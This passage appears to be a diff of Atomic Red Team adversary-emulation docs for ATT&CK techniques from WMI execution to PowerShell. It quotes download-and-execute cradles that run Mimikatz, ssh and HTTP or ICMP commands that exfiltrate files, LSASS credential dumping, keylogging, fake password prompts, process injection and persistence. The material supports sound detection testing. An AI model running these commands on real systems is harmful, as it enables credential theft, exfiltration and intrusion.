When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
**Supported Platforms:** Windows
**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
#### Inputs:
@@ -179,15 +189,17 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
<br/>
## Atomic Test #6 - WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
#### Inputs:
@@ -219,9 +231,6 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
<br/>
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand <encoded command>
Where the EncodedCommand, once decoded, would resemble:
@@ -229,9 +238,14 @@ Where the EncodedCommand, once decoded, would resemble:
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
**Supported Platforms:** Windows
**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
@@ -251,14 +265,16 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
<br/>
## Atomic Test #8 - Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
**Supported Platforms:** Windows
**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
#### Inputs:
atomics/T1048.003/T1048.003.md
+25 -15
View File
@@ -20,15 +20,17 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
<br/>
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
#### Run it with these steps!
@@ -56,15 +58,17 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
<br/>
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e
Exfiltration of specified file over ICMP protocol.
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
#### Inputs:
@@ -90,13 +94,15 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
<br/>
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
Exfiltration of specified file over DNS protocol.
**Supported Platforms:** Linux
**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
#### Run it with these steps!
@@ -122,14 +128,16 @@ Exfiltration of specified file over DNS protocol.
<br/>
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
#### Inputs:
@@ -156,14 +164,16 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
<br/>
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
#### Inputs:
atomics/T1048/T1048.md
+10 -6
View File
@@ -16,17 +16,19 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
<br/>
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988
Input a domain and test Exfiltration over SSH
Remote to Local
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
#### Inputs:
@@ -51,17 +53,19 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
<br/>
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
Input a domain and test Exfiltration over SSH
Local to Remote
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
#### Inputs:
atomics/T1049/T1049.md
+20 -12
View File
@@ -20,15 +20,17 @@ Utilities and commands that acquire this information include [netstat](https://a
<br/>
## Atomic Test #1 - System Network Connections Discovery
auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
@@ -50,15 +52,17 @@ net sessions
<br/>
## Atomic Test #2 - System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
@@ -78,15 +82,17 @@ Get-NetTCPConnection
<br/>
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
Get a listing of network connections.
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -119,15 +125,17 @@ echo "Install netstat on the machine."; exit 1;
<br/>
## Atomic Test #4 - System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
Get a listing of network connections, domains, domain users, and etc.
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
#### Inputs:
atomics/T1053.001/T1053.001.md
+5 -3
View File
@@ -12,13 +12,15 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
<br/>
## Atomic Test #1 - At - Schedule a job
auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e
This test submits a command to be run in the future by the `at` daemon.
**Supported Platforms:** Linux
**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
#### Inputs:
atomics/T1053.002/T1053.002.md
+5 -3
View File
@@ -14,16 +14,18 @@ Note: The <code>at.exe</code> command line utility has been deprecated in curren
<br/>
## Atomic Test #1 - At.exe Scheduled task
auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
**Supported Platforms:** Windows
**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
atomics/T1053.003/T1053.003.md
+15 -9
View File
@@ -16,13 +16,15 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute
<br/>
## Atomic Test #1 - Cron - Replace crontab with referenced file
auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
#### Inputs:
@@ -53,13 +55,15 @@ crontab /tmp/notevil
<br/>
## Atomic Test #2 - Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
#### Inputs:
@@ -95,13 +99,15 @@ rm /etc/cron.weekly/#{cron_script_name}
<br/>
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
#### Inputs:
atomics/T1053.004/T1053.004.md
+5 -3
View File
@@ -12,13 +12,15 @@ An adversary may use the <code>launchd</code> daemon in macOS environments to sc
<br/>
## Atomic Test #1 - Event Monitor Daemon Persistence
auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
**Supported Platforms:** macOS
**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
#### Inputs:
atomics/T1053.005/T1053.005.md
+30 -18
View File
@@ -24,14 +24,16 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
<br/>
## Atomic Test #1 - Scheduled Task Startup Script
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
@@ -57,13 +59,15 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
<br/>
## Atomic Test #2 - Scheduled task Local
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** Windows
**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
#### Inputs:
@@ -93,15 +97,17 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
<br/>
## Atomic Test #3 - Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
**Supported Platforms:** Windows
**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
#### Inputs:
@@ -134,15 +140,17 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
<br/>
## Atomic Test #4 - Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
**Supported Platforms:** Windows
**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
@@ -171,14 +179,16 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
<br/>
## Atomic Test #5 - Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
**Supported Platforms:** Windows
**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
#### Inputs:
@@ -222,13 +232,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
<br/>
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
**Supported Platforms:** Windows
**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
atomics/T1053.006/T1053.006.md
+5 -3
View File
@@ -14,13 +14,15 @@ An adversary may use systemd timers to execute malicious code at system startup
<br/>
## Atomic Test #1 - Create Systemd Service and Timer
auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b
This test creates Systemd service and timer then starts and enables the Systemd timer
**Supported Platforms:** Linux
**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
#### Inputs:
atomics/T1053.007/T1053.007.md
+10 -6
View File
@@ -14,13 +14,15 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
<br/>
## Atomic Test #1 - ListCronjobs
auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
#### Inputs:
@@ -45,13 +47,15 @@ kubectl get cronjobs -n #{namespace}
<br/>
## Atomic Test #2 - CreateCronjob
auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
#### Inputs:
atomics/T1055.001/T1055.001.md
+5 -3
View File
@@ -16,16 +16,18 @@ Running code in the context of another process may allow access to the process's
<br/>
## Atomic Test #1 - Process Injection via mavinject.exe
auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
**Supported Platforms:** Windows
**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
#### Inputs:
atomics/T1055.004/T1055.004.md
+5 -3
View File
@@ -16,9 +16,6 @@ Running code in the context of another process may allow access to the process's
<br/>
## Atomic Test #1 - Process Injection via C#
auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
@@ -28,9 +25,14 @@ Excercises Five Techniques
4. IatInjection
5. ThreadHijack
Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
#### Inputs:
atomics/T1055.012/T1055.012.md
+10 -6
View File
@@ -16,14 +16,16 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
<br/>
## Atomic Test #1 - Process Hollowing using PowerShell
auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
**Supported Platforms:** Windows
**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
#### Inputs:
@@ -57,13 +59,15 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
<br/>
## Atomic Test #2 - RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
This module executes notepad.exe from within the WINWORD.EXE process
**Supported Platforms:** Windows
**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
#### Inputs:
atomics/T1055/T1055.md
+10 -6
View File
@@ -16,17 +16,19 @@ More sophisticated samples may perform multiple process injections to segment mo
<br/>
## Atomic Test #1 - Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
**Supported Platforms:** Windows
**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
@@ -65,16 +67,18 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
<br/>
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
**Supported Platforms:** Windows
**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
#### Inputs:
atomics/T1056.001/T1056.001.md
+10 -6
View File
@@ -20,17 +20,19 @@ Keylogging is the most prevalent type of input capture, with many different ways
<br/>
## Atomic Test #1 - Input Capture
auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
**Supported Platforms:** Windows
**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
#### Inputs:
@@ -60,17 +62,19 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
<br/>
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d
auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
**Supported Platforms:** Linux
**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
atomics/T1056.002/T1056.002.md
+10 -6
View File
@@ -14,14 +14,16 @@ Adversaries may mimic this functionality to prompt users for credentials with a
<br/>
## Atomic Test #1 - AppleScript - Prompt User for Password
auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
**Supported Platforms:** macOS
**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
@@ -41,15 +43,17 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
<br/>
## Atomic Test #2 - PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
atomics/T1056.004/T1056.004.md
+5 -3
View File
@@ -15,13 +15,15 @@
<br/>
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
Hooks functions in PowerShell to read TLS Communications
**Supported Platforms:** Windows
**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
#### Inputs:
atomics/T1057/T1057.md
+10 -6
View File
@@ -14,15 +14,17 @@ In Windows environments, adversaries could obtain details on running processes u
<br/>
## Atomic Test #1 - Process Discovery - ps
auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc
Utilize ps to identify processes.
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
#### Inputs:
@@ -52,15 +54,17 @@ rm #{output_file}
<br/>
## Atomic Test #2 - Process Discovery - tasklist
auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
Utilize tasklist to identify processes.
Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
atomics/T1059.001/T1059.001.md
+90 -54
View File
@@ -50,13 +50,15 @@ PowerShell commands/scripts can also be executed without directly invoking the <
<br/>
## Atomic Test #1 - Mimikatz
auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
#### Inputs:
@@ -81,15 +83,17 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
<br/>
## Atomic Test #2 - Run BloodHound from local disk
auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
#### Inputs:
@@ -133,15 +137,17 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
<br/>
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -168,13 +174,15 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
<br/>
## Atomic Test #4 - Obfuscation Tests
auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
**Supported Platforms:** Windows
**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
@@ -196,13 +204,15 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
@@ -222,15 +232,17 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
<br/>
## Atomic Test #6 - Invoke-AppPathBypass
auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372
Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
@@ -250,15 +262,17 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
<br/>
## Atomic Test #7 - Powershell MsXml COM object - with prompt
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
#### Inputs:
@@ -283,15 +297,17 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
<br/>
## Atomic Test #8 - Powershell XML requests
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
#### Inputs:
@@ -316,15 +332,17 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
#### Inputs:
@@ -349,14 +367,16 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
#### Run it with these steps!
@@ -373,14 +393,16 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
## Atomic Test #11 - PowerShell Fileless Script Execution
auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
**Supported Platforms:** Windows
**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
@@ -407,15 +429,17 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
<br/>
## Atomic Test #12 - PowerShell Downgrade Attack
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
This test requires the manual installation of PowerShell V2.
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
@@ -447,13 +471,15 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
<br/>
## Atomic Test #13 - NTFS Alternate Data Stream Access
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
#### Inputs:
@@ -496,14 +522,16 @@ Write-Host Prereq's for this test cannot be met automatically
<br/>
## Atomic Test #14 - PowerShell Session Creation and Use
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
#### Inputs:
@@ -550,13 +578,15 @@ Enable-PSRemoting
<br/>
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
Executes powershell.exe with variations of the -Command parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
#### Inputs:
@@ -596,13 +626,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
<br/>
